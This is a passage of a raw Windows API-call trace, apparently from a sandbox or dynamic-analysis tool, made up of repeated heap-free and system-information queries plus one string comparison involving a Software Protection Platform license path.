GetProcessHeap () returned 0x2026c630000 [0274.455] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d805e00 | out: hHeap=0x2026c630000) returned 1 [0274.455] GetProcessHeap () returned 0x2026c630000 [0274.455] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7780 | out: hHeap=0x2026c630000) returned 1 [0274.455] GetProcessHeap () returned 0x2026c630000 [0274.455] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d884db0 | out: hHeap=0x2026c630000) returned 1 [0274.455] GetProcessHeap () returned 0x2026c630000 [0274.455] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d719be0 | out: hHeap=0x2026c630000) returned 1 [0274.455] GetProcessHeap () returned 0x2026c630000 [0274.455] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6c2ec0 | out: hHeap=0x2026c630000) returned 1 [0274.456] GetProcessHeap () returned 0x2026c630000 [0274.456] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d7a30 | out: hHeap=0x2026c630000) returned 1 [0274.456] GetProcessHeap () returned 0x2026c630000 [0274.456] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d8060c0 | out: hHeap=0x2026c630000) returned 1 [0274.456] GetProcessHeap () returned 0x2026c630000 [0274.456] HeapFree (in: hHeap=0x2026c630000, dwFlags=0x0, lpMem=0x2026d6d79f0 | out: hHeap=0x2026c630000) returned 1 [0274.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda70, Length=0x50, ResultLength=0x0) [0274.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.456] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda70, Length=0x50, ResultLength=0x0) [0274.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda70, Length=0x50, ResultLength=0x0) [0274.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x50, ResultLength=0x0) [0274.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x50, ResultLength=0x0) [0274.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x50, ResultLength=0x0) [0274.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd960, Length=0x50, ResultLength=0x0) [0274.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.457] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x38, ResultLength=0x0) [0274.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x28, ResultLength=0x0) [0274.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x28, ResultLength=0x0) [0274.459] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x28, ResultLength=0x0) [0274.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6c0, Length=0x28, ResultLength=0x0) [0274.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd730, Length=0x28, ResultLength=0x0) [0274.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x38, ResultLength=0x0) [0274.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.460] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7b0, Length=0x28, ResultLength=0x0) [0274.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7b0, Length=0x28, ResultLength=0x0) [0274.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd650, Length=0x20, ResultLength=0x0) [0274.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5d0, Length=0x20, ResultLength=0x0) [0274.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5d0, Length=0x20, ResultLength=0x0) [0274.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd5d0, Length=0x20, ResultLength=0x0) [0274.463] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x38, ResultLength=0x0) [0274.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x38, ResultLength=0x0) [0274.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd710, Length=0x20, ResultLength=0x0) [0274.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6a0, Length=0x20, ResultLength=0x0) [0274.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6a0, Length=0x20, ResultLength=0x0) [0274.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.464] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.465] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x50, ResultLength=0x0) [0274.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x50, ResultLength=0x0) [0274.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x50, ResultLength=0x0) [0274.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x50, ResultLength=0x0) [0274.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x50, ResultLength=0x0) [0274.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x50, ResultLength=0x0) [0274.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x50, ResultLength=0x0) [0274.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.466] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0274.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0274.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0274.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0274.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.470] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x28, ResultLength=0x0) [0274.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0274.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.471] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0274.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0274.473] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0274.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x20, ResultLength=0x0) [0274.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0274.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0274.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0274.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0274.474] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x20, ResultLength=0x0) [0274.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0274.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0274.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.475] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x50, ResultLength=0x0) [0274.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x50, ResultLength=0x0) [0274.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbd0, Length=0x50, ResultLength=0x0) [0274.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x50, ResultLength=0x0) [0274.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x50, ResultLength=0x0) [0274.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.476] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x50, ResultLength=0x0) [0274.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdac0, Length=0x50, ResultLength=0x0) [0274.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.477] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0274.481] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0274.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0274.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd820, Length=0x28, ResultLength=0x0) [0274.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.482] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd890, Length=0x28, ResultLength=0x0) [0274.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0274.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.483] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0274.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd910, Length=0x28, ResultLength=0x0) [0274.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0274.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x20, ResultLength=0x0) [0274.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0274.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0274.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0274.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9f0, Length=0x38, ResultLength=0x0) [0274.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x20, ResultLength=0x0) [0274.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0274.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd800, Length=0x20, ResultLength=0x0) [0274.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0274.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc00, Length=0x28, ResultLength=0x0) [0274.489] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0274.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0274.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0274.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc80, Length=0x50, ResultLength=0x0) [0274.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x38, ResultLength=0x0) [0274.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0274.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0274.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9e0, Length=0x28, ResultLength=0x0) [0274.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda50, Length=0x28, ResultLength=0x0) [0274.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdbb0, Length=0x38, ResultLength=0x0) [0274.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdad0, Length=0x28, ResultLength=0x0) [0274.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0274.500] 